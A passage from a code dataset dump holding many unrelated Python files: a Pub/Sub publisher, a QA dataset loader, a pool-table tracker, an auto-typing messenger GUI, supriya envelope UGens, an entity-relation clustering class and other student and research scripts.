publisher.publish(topic_path, data=data)\n time.sleep(5)\n\n print('Published messages.')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter\n )\n parser.add_argument('project', help='Your Google Cloud project ID')\n\n subparsers = parser.add_subparsers(dest='command')\n\n publish_parser = subparsers.add_parser(\n 'publish', help=publish_messages.__doc__)\n publish_parser.add_argument('topic_name')\n\n args = parser.parse_args()\n\n if args.command == 'publish':\n print('Publishing messages... Press CTRL+C to interrupt.')\n publish_messages(args.project, args.topic_name)\n","sub_path":"adaptive-triggers/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"88894549","text":"from torch.utils.data import Dataset\nimport json\nfrom tqdm import tqdm\nimport torch\n\nROPES_DATA_PATH = 'data/ropes/'\nMAX_PARAGRAPH_LEN = 400\n\nclass ROPES(Dataset):\n def __init__(self, tokenizer, file_path, eval=False):\n self.tokenizer = tokenizer\n self.eval = eval\n contexts, questions, answers, qids = get_examples(file_path)\n self.qids = qids\n self.questions = questions\n self.contexts = contexts\n self.answers = answers\n self.encodings = tokenizer(contexts, questions, padding=True, truncation=True)\n self._update_start_end_idxs()\n\n def _update_start_end_idxs(self):\n starts = []\n ends = []\n question_encodings = self.tokenizer(self.questions)\n context_encodings = self.tokenizer(self.contexts)\n\n for i in tqdm(range(len(self.answers))):\n answer = self.answers[i]\n #tokens = self.tokenizer.convert_ids_to_tokens(self.encodings['input_ids'][i])\n q_idx = self.questions[i].find(answer)\n c_idx = self.contexts[i].find(answer)\n\n if q_idx != -1:\n assert(self.questions[i][q_idx:q_idx+len(answer)] == answer)\n y1 = question_encodings.char_to_token(i, q_idx)-1+len(context_encodings[i])\n y2 = question_encodings.char_to_token(i, q_idx+len(answer)-1)\n\n if not y2 and y1:\n y2 = y1 + len(self.tokenizer.tokenize(answer)) - 1\n elif y1:\n y2 += -1+len(context_encodings[i])\n\n y1 = min(y1, 512)\n y2 = min(y2, 512)\n\n elif c_idx != -1:\n y1 = self.encodings.char_to_token(i, c_idx)\n y2 = self.encodings.char_to_token(i, c_idx+len(answer)-1)\n if not y1:\n y1, y2 = 512, 512\n if not y2 and y1:\n y2 = y1 + len(self.tokenizer.tokenize(answer)) - 1\n\n starts.append(y1)\n ends.append(y2)\n\n\n self.encodings['start_positions'] = starts\n self.encodings['end_positions'] = ends\n\n def __getitem__(self, idx):\n inputs = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\n if self.eval:\n inputs['id'] = self.qids[idx]\n return inputs\n\n def __len__(self):\n return len(self.answers)\n\n\ndef get_examples(file_path):\n contexts, questions, answers, qids = [], [], [], []\n with open(f'{ROPES_DATA_PATH}{file_path}', 'r', encoding='utf-8') as f:\n data = json.load(f)\n data = data['data']\n for article in tqdm(data):\n for para in article['paragraphs']:\n background = para['background']\n situation = para['situation']\n context = background + ' ' + situation\n for qa in para['qas']:\n id = qa['id']\n question = qa['question']\n for ans in qa['answers']:\n answer = ans['text']\n contexts.append(context)\n questions.append(question)\n answers.append(answer)\n qids.append(id)\n\n return contexts, questions, answers, qids\n\nif __name__ == '__main__':\n from transformers import BertTokenizerFast\n\n tokenizer = BertTokenizerFast.from_pretrained('bert-base-cased')\n dataset = ROPES(tokenizer, 'train-v1.0.json')\n print(len(dataset[0]['input_ids']))\n\n\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"16825466","text":"#Christina Roberts\r\n#How to Code 2.0\r\n\r\n\r\nfrom tkinter import*\r\n\r\nprint(\"Please left click anywhere on the canvas. Thank you.\")\r\n\r\n\r\ndef main():\r\n root = Tk()\r\n my_window = Canvas(root, width = 300, height = 300)\r\n my_window.pack()\r\n my_window.bind(\"<Button>\", test_click)\r\n root.mainloop()\r\ndef test_click(event):\r\n \r\n print(\"Clicked at: \", event.x, event.y)\r\n\r\n\r\n\r\n\r\nmain()\r\n","sub_path":"click_event.py","file_name":"click_event.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"201680345","text":"from lxml import etree\nimport ConfigParser, os\n\nsettings = ConfigParser.ConfigParser()\n\nif os.path.split(os.getcwd())[-1] == 'lib':\n settings.read('../conf/assessment.conf')\nelse:\n settings.read('conf/assessment.conf')\n\ndef evaluateReport(report_file):\n alerts = []\n report = etree.parse(report_file)\n find_text = etree.XPath( \"/SECANT/PAKITI_TEST/PKG/text()\")\n pkgs = find_text(report)\n if pkgs:\n for pkg in pkgs:\n alerts.append(\"Vulnerable package: \" + pkg)\n return alerts","sub_path":"internal_tests/pakiti_test/pakiti_test.py","file_name":"pakiti_test.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"25348476","text":"#send button will be disabled while running\n#after complete run ,again start button will able to click\n#while loop instead of for loop\n#infinite loop for 0 option in [how many times]\n\n\nfrom tkinter import *\nfrom threading import *\nimport pyautogui as pag\nimport time\n\nmw = Tk()\nmw.title('auto messenger')\nmw.iconbitmap('images/msg.ico')\n\ndef justcheck(check):\n if check:\n send_btn.config(text='running...', state='disabled')\n else:\n send_btn.config(text='start sending..', state='normal')\n\n\nclass automessenger(Thread): #class\n hmt_c = 5\n wt_c = 3\n msg_c = 'running'\n def run(self):\n justcheck(True)\n i=1\n while True:\n time.sleep(self.wt_c)\n pag.typewrite(self.msg_c)\n pag.press('enter')\n if self.hmt_c==i:\n justcheck(False)\n break\n i +=1\n\n\ndef messenger(hmt, wt, msg):\n send = automessenger() #object of class\n send.hmt_c = int(hmt)\n send.wt_c = float(wt)\n send.msg_c = msg\n send.daemon = True #to stop the sub thread automatically after the main thead is stopped\n send.start() #calling of method\n\n\n# creating widgets\nhmt_label = Label(mw, text='How Many Times:', font=('Arial', 14)) # hmt=how many times\nhmt_input = Entry(mw, width=5, font=('Arial', 18))\nhmt_times = Label(mw, text='Times', font=('Arial', 12))\n\nwt_label = Label(mw, text='Waiting Time :', font=('Arial', 14)) # wt = waiting times\nwt_input = Entry(mw, width=5, font=('Arial', 18))\nwt_sec = Label(mw, text='Seconds', font=('Arial', 12))\n\nmsg_label = Label(mw, text='Mesage:', font=('Arial', 14)) # msg= message\nmsg_input = Entry(mw, width=30, font=('Arial', 18)) # width=30, box will be bigger on x axis\n\nsend_btn = Button(mw, text='start sending!', font=('Arial', 14), command=lambda: messenger(hmt_input.get(), wt_input.get(), msg_input.get()))\n\n# showing widgets\nhmt_label.grid(row=0, column=0, padx=10, pady=10, sticky=E) # sticky specify the location either east,west,north,south\nhmt_input.grid(row=0, column=1, padx=10, pady=10, sticky=W)\nhmt_times.grid(row=0, column=1, padx=100, pady=10, sticky=W)\n\nwt_label.grid(row=1, column=0, padx=10, pady=10, sticky=E)\nwt_input.grid(row=1, column=1, padx=10, pady=10, sticky=W)\nwt_sec.grid(row=1, column=1, padx=100, pady=10, sticky=W)\n\nmsg_label.grid(row=2, column=0, padx=10, pady=10, sticky=E)\nmsg_input.grid(row=2, column=1, padx=10, pady=10, sticky=W)\n\nsend_btn.grid(row=3, column=1, pady=25)\n\nmw.mainloop()\n\n#justcheck\n#class automesenger\n#def messenger(hmt,wt,msg)","sub_path":"messagefinal.py","file_name":"messagefinal.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"469569740","text":"\"\"\"Extract NHDPoint to use for the network analysis.\n\nPoint types listing: https://prd-wret.s3-us-west-2.amazonaws.com/assets/palladium/production/s3fs-public/atoms/files/NHDv2.2.1_poster_081216.pdf\n\"\"\"\n\nfrom pathlib import Path\nimport os\nfrom time import time\n\nimport geopandas as gp\nfrom geofeather import to_geofeather, from_geofeather\nfrom nhdnet.geometry.points import to2D\nfrom nhdnet.io import serialize_df, deserialize_df, serialize_sindex, to_shp\n\nfrom analysis.constants import REGIONS, REGION_GROUPS, CRS\n\nKEEP_COLS = [\"NHDPlusID\", \"FType\", \"FCode\", \"GNIS_Name\", \"geometry\"]\n\n# Dam, reservoir, waterfall\nKEEP_FTYPES = [343, 436, 487]\n\n\nsrc_dir = Path(\"data/nhd/source/huc4\")\nnhd_dir = Path(\"data/nhd\")\n\n\nout_dir = nhd_dir / \"extra\"\n\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\nstart = time()\n\nmerged = None\nfor region, HUC2s in REGION_GROUPS.items():\n print(\"\\n----- {} ------\\n\".format(region))\n\n for HUC2 in HUC2s:\n for i in REGIONS[HUC2]:\n HUC4 = \"{0}{1:02d}\".format(HUC2, i)\n\n read_start = time()\n print(\"\\n\\n------------------- Reading {} -------------------\".format(HUC4))\n gdb = src_dir / HUC4 / \"NHDPLUS_H_{HUC4}_HU4_GDB.gdb\".format(HUC4=HUC4)\n\n df = gp.read_file(gdb, layer=\"NHDPoint\")\n df.NHDPlusID = df.NHDPlusID.astype(\"uint64\")\n\n df = df.loc[df.FType.isin(KEEP_FTYPES)][KEEP_COLS].copy()\n\n df.geometry = df.geometry.apply(to2D)\n df = df.to_crs(CRS)\n\n df.FType = df.FType.astype(\"uint16\")\n df.FCode = df.FCode.astype(\"uint16\")\n df[\"HUC2\"] = HUC2\n\n if merged is None:\n merged = df\n else:\n merged = merged.append(df, ignore_index=True, sort=False)\n\nprint(\"Extracted {:,} NHD Points\".format(len(merged)))\ndf = merged.reset_index(drop=True)\n\n# add our own ID,\ndf[\"id\"] = df.index.values.copy()\ndf.id = (df.id + 1).astype(\"uint32\")\n\nprint(\"Serializing {:,} points...\".format(len(df)))\nto_geofeather(df, out_dir / \"nhd_points.feather\")\nto_shp(df, out_dir / \"nhd_points.shp\")\n\nprint(\"Done in {:.2f}s\\n============================\".format(time() - start))\n","sub_path":"analysis/prep/network/extract_nhd_points.py","file_name":"extract_nhd_points.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"82564052","text":"from pool_table_class import PoolTable\nfrom datetime import datetime, timedelta\nimport json\nimport time\n\ntables = []\nlog_lists = []\n\n\ndef main(tables, log_lists):\n for i in range(1, 13):\n pool = PoolTable(i)\n tables.append(pool)\n\n def calculate_duration_time(start_time):\n current_time = datetime.now()\n\n time_duration = current_time - start_time\n\n duration_in_seconds = time_duration.total_seconds()\n\n minute = duration_in_seconds / 60\n\n if minute < 1:\n minute = 0\n\n return round(minute)\n\n def calculate_total_time_played(total_time):\n total_in_seconds = total_time.total_seconds()\n\n minute = total_in_seconds / 60\n\n if minute < 1:\n minute = 0\n\n return round(minute)\n\n def calculate_amount(min):\n hour = min / 60\n amt = hour * 30\n\n return amt\n\n def display_tables(tables):\n date = datetime.now().strftime(\"%m-%d-%Y\")\n print(f\"\\nToday's date: {date}\")\n print(\"------------------------------------------------------------------\")\n for table in tables:\n if table.is_occupied:\n if table.time_start == None:\n print(\n f\"Table {table.number} - Occupied || Checked out: {table.start_time_display}) || 0 minute(s)\")\n else:\n minute = calculate_duration_time(table.time_start)\n\n print(\n f\"Table {table.number} - Occupied || Checked out: {table.start_time_display} || {'%.0f' % minute} minute(s)\")\n else:\n print(f\"Table {table.number} - Not Occupied\")\n print(\"------------------------------------------------------------------\\n\")\n\n def save_log(log_lists, number, start_time, end_time, min):\n date = datetime.now().strftime(\"%m-%d-%Y\")\n\n log = {\"Table Number\": number,\n \"Check-out Time\": start_time,\n \"Check-in Time\": end_time,\n \"Time Played (in minute)\": min}\n\n with open(f\"{date}.json\", \"w\") as file:\n log_lists.append(log)\n json.dump(log_lists, file)\n\n def print_out_log():\n date = datetime.now().strftime(\"%m-%d-%Y\")\n\n with open(f\"{date}.json\") as file:\n log_files = json.load(file)\n for file in log_files:\n print(f\"Table Number: {file['Table Number']}\")\n print(f\"Check-out Time: {file['Check-out Time']}\")\n print(f\"Check-in Time: {file['Check-in Time']}\")\n print(\n f\"Total Time Played: {'.%0f' % file['Time Played (in minute)']} minute(s)\")\n print('-------------------------------')\n\n while True:\n choice = int(input(\"\"\"Please choose the option number: \n 1. Display the status of the pool tables\n 2. Check out the pool table\n 3. Check in the pool table\n 4. Quit the program\n \"\"\"))\n\n if choice == 1:\n display_tables(tables)\n\n elif choice == 2:\n display_tables(tables)\n\n table_num = int(input(\n \"\\nPlease enter the table number to check out: \"))\n\n table = tables[table_num-1]\n\n if table.is_occupied:\n print(f\"\\nPool Table {table_num} is currently occupied.\\n\")\n else:\n table.check_out_table()\n display_tables(tables)\n\n elif choice == 3:\n display_tables(tables)\n\n table_num = int(\n input(\"Please enter the table number to check in: \"))\n\n table = tables[table_num-1]\n table.check_in_table()\n\n min = calculate_total_time_played(table.total_time)\n amount = calculate_amount(min)\n\n display_tables(tables)\n\n print(f\"\\nPool Table {table_num}\")\n print(f\" - Check in Time: {table.end_time_display}\")\n print(f\" - Total Time Played: {'%.0f' % min} minute(s)\")\n print(f\" - The Total Cost: ${'%.2f' % amount}\\n\\n\")\n\n save_log(log_lists, table.number, table.start_time_display,\n table.end_time_display, min)\n\n elif choice == 4:\n break\n\n else:\n print(\"You entered the wrong input. Please try again\")\n\n # Reading from .json file and printing out\n # print(\"\\nPrinting out the today's log..\\n\")\n # time.sleep(3)\n # print('-------------------------------')\n # print_out_log()\n\n\nmain(tables, log_lists)\n","sub_path":"pool_table_main.py","file_name":"pool_table_main.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"563114925","text":"#\r\n#一只青蛙掉在井里了,井高20米,\r\n# 青蛙白天往上爬3米,晚上下滑2米,\r\n# 问第几天能出来?请编程求出。\r\n#\r\n\r\n#掉下去的天数\r\nday = 1\r\n#距离井口的米数\r\nmeter = 20\r\n\r\nwhile meter>0:\r\n meter -= 3\r\n if meter<=0:\r\n break\r\n meter += 2\r\n day += 1\r\n\r\nprint(\"青蛙跳出来了\")\r\nprint(\"青蛙总共跳了\",day,\"天\")\r\n","sub_path":"frog.py","file_name":"frog.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"547181776","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport math\n\nimport argparse\nimport sys\nimport tempfile\nimport csv\nimport numpy as np \nfrom input_data_backward import convert_predicted_data\nfrom backward_model import ventral_feed_backward \nimport tensorflow as tf\nimport pickle \n\n\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\nbatch_size = 200\n\n\n\n\ndef main(unused_argv):\n \n # Create the Estimator\n classifier = tf.estimator.Estimator(model_fn=ventral_feed_backward, model_dir=\"/tmp/my_back_model\")\n\n #'''\n tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n \n\n logging_hook = tf.train.LoggingTensorHook(\n tensors=tensors_to_log, every_n_iter=100)\n\n print(\"Reading Train data\")\n with open('../data_for_backward_training.pkl', 'r') as f: \n train_data, train_labels, _,_= pickle.load(f)\n\n\n\n # Train the model\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x= convert_predicted_data(train_data),\n y= convert_positions(labels = train_labels),\n batch_size= batch_size,\n num_epochs=None,\n shuffle=True)\n \n classifier.train(\n input_fn=train_input_fn,\n steps=40000,\n hooks=[logging_hook])\n #'''\n\n\n# read in eval data after done: \n\n with open('../predict_files.pkl', 'r') as f: \n _,_,eval_data,eval_labels= pickle.load(f)\n \n # Evaluate the model and print results\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x= convert_predicted_data(eval_data),\n y= convert_positions(labels = eval_labels),\n num_epochs=1,\n shuffle=False)\n\n\n eval_results = classifier.evaluate(input_fn=eval_input_fn)\n print(eval_results)\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"model_src/colour/bw_network/train_backward_network.py","file_name":"train_backward_network.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"595121242","text":"# Use open to open file \"foo.txt\" for reading\nfile = open(\"foo.txt\", \"r\") \nfile_object = file.read()\n# Print all the lines in the file\nprint(file_object) \n\n# Close the file\nfile.close()\n\n# Use open to open file \"bar.txt\" for writing\nfile2 = open(\"bar.txt\", \"w\") \n# Use the write() method to write three lines to the file\nfile2.write(\"imran imran\")\nfile2.close()\n\nafterWrite =open(\"bar.txt\", \"r\")\nfile_object2 = afterWrite.read()\nprint(file_object2)\n\n# Close the file\n\nafterWrite.close()","sub_path":"src/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"250419796","text":"from os import path\nfrom shutil import copyfile\n\nimport cv2\nimport numpy as np\n\nfrom j_math.camera import Camera\nfrom j_math.point import Point\nfrom j_math.rotation import Rotation\n\nclass MVSCamera(Camera):\n def __init__(self, index, position, rotation, fx, fy, cx, cy, depth_min, depth_interval):\n Camera.__init__(self, position, rotation, fx, fy, cx, cy)\n self.index = index\n self.depth_min = depth_min\n self.depth_interval = depth_interval\n self.image_path = None\n\n def set_image_file(self, file_path):\n self.image_path = file_path\n\n def to_string(self):\n return '\\n'.join([\n 'extrinsic',\n ' '.join(str(i) for i in self.extrinsic[0]),\n ' '.join(str(i) for i in self.extrinsic[1]),\n ' '.join(str(i) for i in self.extrinsic[2]),\n ' '.join(str(i) for i in self.extrinsic[3]),\n '',\n 'intrinsic',\n ' '.join(str(i) for i in self.intrinsic[0]),\n ' '.join(str(i) for i in self.intrinsic[1]),\n ' '.join(str(i) for i in self.intrinsic[2]),\n '',\n '{} {}'.format(self.depth_min, self.depth_interval),\n ''\n ])\n\n def from_string(self, string):\n lines = string.splitlines()\n if lines[0] != 'extrinsic' or lines[6] != 'intrinsic':\n raise Exception('invalid format')\n extrinsic_r_0 = np.array([float(v) for v in lines[1].strip().split()])\n extrinsic_r_1 = np.array([float(v) for v in lines[2].strip().split()])\n extrinsic_r_2 = np.array([float(v) for v in lines[3].strip().split()])\n extrinsic_r_3 = np.array([float(v) for v in lines[4].strip().split()])\n extrinsic = np.array([extrinsic_r_0,\n extrinsic_r_1,\n extrinsic_r_2,\n extrinsic_r_3])\n intrinsic_r_0 = np.array([float(v) for v in lines[7].strip().split()])\n intrinsic_r_1 = np.array([float(v) for v in lines[8].strip().split()])\n intrinsic_r_2 = np.array([float(v) for v in lines[9].strip().split()])\n intrinsic = np.array([intrinsic_r_0,\n intrinsic_r_1,\n intrinsic_r_2])\n\n depths = np.array([float(v) for v in lines[11].strip().split()])\n depth_min = depths[0]\n depth_int = depths[1]\n self.extrinsic = extrinsic\n self.intrinsic = intrinsic\n self.depth_min = depth_min\n self.depth_interval = depth_int\n \n\n def to_file(self, output_path):\n image_file_name = '{:08d}.jpg'.format(self.index)\n image_file_path = path.join(output_path, 'images', image_file_name)\n # write image iff path exists\n if(self.image_path):\n copyfile(self.image_path, image_file_path)\n else:\n raise Exception('No image found')\n\n camera_file_name = '{:08d}_cam.txt'.format(self.index)\n camera_file_path = path.join(output_path, 'cams', camera_file_name)\n\n # write camera\n with open(camera_file_path, 'w') as f:\n f.writelines(self.to_string())\n\n @staticmethod\n def from_file(file_path):\n image_name = file_path.split('/')[-1]\n image_prefix = image_name[0:8]\n mvs_path = '/'.join(file_path.split('/')[0:-2])\n image_path = path.join(mvs_path, 'images', image_prefix + '.jpg')\n\n pos = Point()\n rot = Rotation()\n fx = 0\n fy = 0\n cx = 0\n cy = 0\n dm = 0\n di = 0\n\n mvs_camera = MVSCamera(0, pos, rot, fx, fy, cx, cy, dm, di)\n with open(file_path, 'r') as f:\n mvs_camera.from_string(f.read())\n mvs_camera.index = int(image_prefix)\n return mvs_camera\n","sub_path":"scripts/mvs/mvs_camera.py","file_name":"mvs_camera.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"2363126","text":"import collections\n\nfrom supriya import CalculationRate\nfrom supriya.synthdefs import UGen\n\n\nclass Done(UGen):\n \"\"\"\n Triggers when `source` sets its `done` flag.\n\n ::\n\n >>> source = supriya.ugens.Line.kr()\n >>> done = supriya.ugens.Done.kr(source=source,)\n >>> done\n Done.kr()\n\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n _ordered_input_names = collections.OrderedDict([(\"source\", None)])\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n ### INITIALIZER ###\n\n def __init__(self, calculation_rate=None, source=None):\n if not (hasattr(source, \"has_done_flag\") and source.has_done_flag):\n raise ValueError(repr(source))\n UGen.__init__(self, calculation_rate=calculation_rate, source=source)\n\n\nclass EnvGen(UGen):\n \"\"\"\n An envelope generator.\n\n ::\n\n >>> envelope = supriya.synthdefs.Envelope.percussive()\n >>> supriya.ugens.EnvGen.ar(envelope=envelope)\n EnvGen.ar()\n\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n _has_done_flag = True\n _ordered_input_names = collections.OrderedDict(\n [\n (\"gate\", 1.0),\n (\"level_scale\", 1.0),\n (\"level_bias\", 0.0),\n (\"time_scale\", 1.0),\n (\"done_action\", 0.0),\n (\"envelope\", None),\n ]\n )\n _unexpanded_input_names = (\"envelope\",)\n _valid_calculation_rates = (CalculationRate.AUDIO, CalculationRate.CONTROL)\n\n ### PRIVATE METHODS ###\n\n @classmethod\n def _new_expanded(\n cls,\n calculation_rate=None,\n done_action=None,\n envelope=None,\n gate=1.0,\n level_bias=0.0,\n level_scale=1.0,\n time_scale=1.0,\n ):\n import supriya.synthdefs\n\n if not isinstance(done_action, supriya.synthdefs.Parameter):\n done_action = supriya.DoneAction.from_expr(done_action)\n if envelope is None:\n envelope = supriya.synthdefs.Envelope()\n assert isinstance(envelope, supriya.synthdefs.Envelope)\n envelope = envelope.serialize()\n return super(EnvGen, cls)._new_expanded(\n calculation_rate=calculation_rate,\n done_action=done_action,\n envelope=envelope,\n gate=gate,\n level_bias=level_bias,\n level_scale=level_scale,\n time_scale=time_scale,\n )\n\n\nclass Free(UGen):\n \"\"\"\n Frees the node at `node_id` when triggered by `trigger`.\n\n ::\n\n >>> node_id = 1000\n >>> trigger = supriya.ugens.Impulse.kr(frequency=1.0)\n >>> free = supriya.ugens.Free.kr(node_id=node_id, trigger=trigger,)\n >>> free\n Free.kr()\n\n \"\"\"\n\n _ordered_input_names = collections.OrderedDict(\n [(\"trigger\", 0.0), (\"node_id\", None)]\n )\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n\nclass FreeSelf(UGen):\n \"\"\"\n Frees the enclosing synth when triggered by `trigger`.\n\n ::\n\n >>> trigger = supriya.ugens.Impulse.kr(frequency=1.0)\n >>> free_self = supriya.ugens.FreeSelf.kr(trigger=trigger,)\n >>> free_self\n FreeSelf.kr()\n\n \"\"\"\n\n _ordered_input_names = collections.OrderedDict([(\"trigger\", None)])\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n\nclass FreeSelfWhenDone(UGen):\n \"\"\"\n Frees the enclosing synth when `source` sets its `done` flag.\n\n ::\n\n >>> source = supriya.ugens.Line.kr()\n >>> free_self_when_done = supriya.ugens.FreeSelfWhenDone.kr(source=source,)\n >>> free_self_when_done\n FreeSelfWhenDone.kr()\n\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n _ordered_input_names = collections.OrderedDict([(\"source\", None)])\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n ### INITIALIZER ###\n\n def __init__(self, calculation_rate=None, source=None):\n if not (hasattr(source, \"has_done_flag\") and source.has_done_flag):\n raise ValueError(repr(source))\n UGen.__init__(self, calculation_rate=calculation_rate, source=source)\n\n\nclass Pause(UGen):\n \"\"\"\n Pauses the node at `node_id` when triggered by `trigger`.\n\n ::\n\n >>> node_id = 1000\n >>> trigger = supriya.ugens.Impulse.kr(frequency=1.0)\n >>> pause = supriya.ugens.Pause.kr(node_id=node_id, trigger=trigger,)\n >>> pause\n Pause.kr()\n\n \"\"\"\n\n _ordered_input_names = collections.OrderedDict(\n [(\"trigger\", None), (\"node_id\", None)]\n )\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n\nclass PauseSelf(UGen):\n \"\"\"\n Pauses the enclosing synth when triggered by `trigger`.\n\n ::\n\n >>> trigger = supriya.ugens.Impulse.kr(frequency=1.0)\n >>> pause_self = supriya.ugens.PauseSelf.kr(trigger=trigger,)\n >>> pause_self\n PauseSelf.kr()\n\n \"\"\"\n\n _ordered_input_names = collections.OrderedDict([(\"trigger\", None)])\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n\nclass PauseSelfWhenDone(UGen):\n \"\"\"\n Pauses the enclosing synth when `source` sets its `done` flag.\n\n ::\n\n >>> source = supriya.ugens.Line.kr()\n >>> pause_self_when_done = supriya.ugens.PauseSelfWhenDone.kr(source=source,)\n >>> pause_self_when_done\n PauseSelfWhenDone.kr()\n\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n _ordered_input_names = collections.OrderedDict([(\"source\", None)])\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n ### INITIALIZER ###\n\n def __init__(self, calculation_rate=None, source=None):\n if not (hasattr(source, \"has_done_flag\") and source.has_done_flag):\n raise ValueError(repr(source))\n UGen.__init__(self, calculation_rate=calculation_rate, source=source)\n\n\nclass Linen(UGen):\n \"\"\"\n A simple line generating unit generator.\n\n ::\n\n >>> supriya.ugens.Linen.kr()\n Linen.kr()\n\n \"\"\"\n\n _has_done_flag = True\n _ordered_input_names = collections.OrderedDict(\n [\n (\"gate\", 1.0),\n (\"attack_time\", 0.01),\n (\"sustain_level\", 1.0),\n (\"release_time\", 1.0),\n (\"done_action\", 0),\n ]\n )\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n","sub_path":"supriya/ugens/envelopes.py","file_name":"envelopes.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"649295981","text":"import pandas as pd\nimport numpy as np\nimport os\nimport tensorflow as tf\nimport pickle\nfrom sklearn.cluster import KMeans\nimport time\n# pd.set_option('display.max_rows',None)\nclass Collector:\n\n def __init__(self, path=\"../data/WN18/\", num_r=5, num_E=1000):\n self.import_data(path)\n self.num_r = num_r\n self.num_E = num_E\n\n def import_data(self, path):\n # self.entities = pd.read_csv(os.path.join(path, \"entity2id.txt\"), skiprows=1,\n # names=[\"entity\", \"id\"], header=None, sep=\"\\t\", index_col=\"id\")\n # self.relations = pd.read_csv(os.path.join(path,\"relation2id.txt\"), skiprows=1,\n # names=[\"relation\", \"id\"], header=None, sep=\"\\t\",index_col=\"id\")\n with open(os.path.join(path, \"entity2id.txt\")) as ent_file:\n self.ent_size = int(ent_file.readline())\n with open(os.path.join(path, \"relation2id.txt\")) as REL_file:\n self.REL_size = int(REL_file.readline())\n self.trains = pd.read_csv(os.path.join(path, \"train2id.txt\"), skiprows=1,\n names=[\"head\", \"tail\", \"RELATION\"], header=None, sep=\" \")\n self.train_size = len(self.trains)\n with open(os.path.join(path, \"embeddings.pkl\"), 'rb') as f:\n self.parameter_lists = pickle.load(f)\n\n self.sess = tf.Session()\n self.ent_embeddings = tf.Variable(initial_value=self.parameter_lists[\"ent_embeddings\"])\n self.REL_embeddings = tf.Variable(initial_value=self.parameter_lists[\"rel_embeddings\"])\n\n self.sess.run(tf.global_variables_initializer())\n print(self.ent_size, \"entities loaded...\")\n print(self.REL_size, \"RELATIONs loaded...\")\n\n def cluster(self):\n groups = self.trains.groupby(self.trains[u'RELATION'])\n clustered = pd.DataFrame(columns=list(self.trains.columns)+[\"relation\"])\n self.rel_embeddings = np.empty(shape=[0, self.ent_embeddings.shape[1]], dtype=np.float32)\n for group in groups:\n if len(group[1]) >= self.num_r:\n num_clusters = self.num_r\n else:\n num_clusters = len(group[1])\n heads = self.sess.run(tf.squeeze(tf.nn.embedding_lookup(self.ent_embeddings, group[1][['head']])))\n tails = self.sess.run(tf.squeeze(tf.nn.embedding_lookup(self.ent_embeddings, group[1][['tail']])))\n difference = tails - heads\n # print(type(heads), heads.shape)\n # print(type(difference), difference.shape)\n estimator = KMeans(n_clusters=num_clusters)\n estimator.fit(difference)\n rel_label = [self.num_r * group[0] + i for i in estimator.labels_]\n\n buffer = group[1].reset_index(drop=True)\n buffer['relation'] = pd.Series(rel_label, dtype=np.int32)\n clustered = pd.concat([clustered, buffer], ignore_index=True)\n self.rel_embeddings = np.append(self.rel_embeddings, estimator.cluster_centers_, axis=0)\n print(\"finish relation clustering, id: \", group[0])\n\n self.trains = clustered\n self.trains.reset_index(drop=True)\n # print(self.trains)\n HEAD = pd.Series(np.empty([self.train_size]), dtype=np.int32)\n TAIL = pd.Series(np.empty([self.train_size]), dtype=np.int32)\n entities = self.sess.run(self.ent_embeddings)\n estimator = KMeans(n_clusters=self.num_E)\n estimator.fit(entities)\n\n for index, row in self.trains.iterrows():\n HEAD[index] = estimator.labels_[row['head']]\n TAIL[index] = estimator.labels_[row['tail']]\n self.trains['HEAD'] = HEAD\n self.trains['TAIL'] = TAIL\n self.ENT_embeddings = estimator.cluster_centers_.astype(np.float32)\n print(\"finish entity clustering.\")\n print(\"finish clustering.\")\n\n clustering_and_embeddings = {\"clustering\": self.trains, \"ENT_embeddings\": self.ENT_embeddings,\n \"rel_embeddings\": 